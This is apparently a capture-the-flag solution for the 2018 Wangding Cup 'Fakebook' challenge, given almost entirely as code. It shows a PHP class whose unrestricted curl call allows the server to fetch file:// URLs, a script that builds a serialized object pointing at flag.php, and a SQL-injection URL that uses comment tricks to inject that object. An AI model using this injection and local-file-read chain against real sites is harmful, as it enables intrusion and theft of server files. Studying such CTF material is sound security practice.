[网鼎杯 2018]Fakebook

 1 <?php
 2 
 3 class UserInfo
 4 {
 5     public $name = "";
 6     public $age = 0;
 7     public $blog = "";
 8 
 9     public function __construct($name, $age, $blog)
10     {
11         $this->name = $name;
12         $this->age = (int)$age;
13         $this->blog = $blog;
14     }
15 
16     function get($url)
17     {
18         $ch = curl_init();
19 
20         curl_setopt($ch, CURLOPT_URL, $url);
21         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
22         $output = curl_exec($ch);
23         $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
24         if($httpCode == 404) {
25             return 404;
26         }
27         curl_close($ch);
28 
29         return $output;
30     }
31 
32     public function getBlogContents ()
33     {
34         return $this->get($this->blog);
35     }
36 
37     public function isValidBlog ()
38     {
39         $blog = $this->blog;
40         return preg_match("/^(((http(s?))://)?)([0-9a-zA-Z-]+.)+[a-zA-Z]{2,6}(:[0-9]+)?(/S*)?$/i", $blog);
41     }
42 
43 }

<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }
}
$userinfo = new UserInfo("user",18,"file:///var/www/html/flag.php");
echo serialize($userinfo);

O:8:"UserInfo":3:{s:4:"name";s:4:"user";s:3:"age";i:18;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

http://14eab04c-f0b7-47be-997b-0a935abc8d95.node3.buuoj.cn/view.php?no=-1/*!union*//*!select*/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:4:"user";s:3:"age";i:18;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'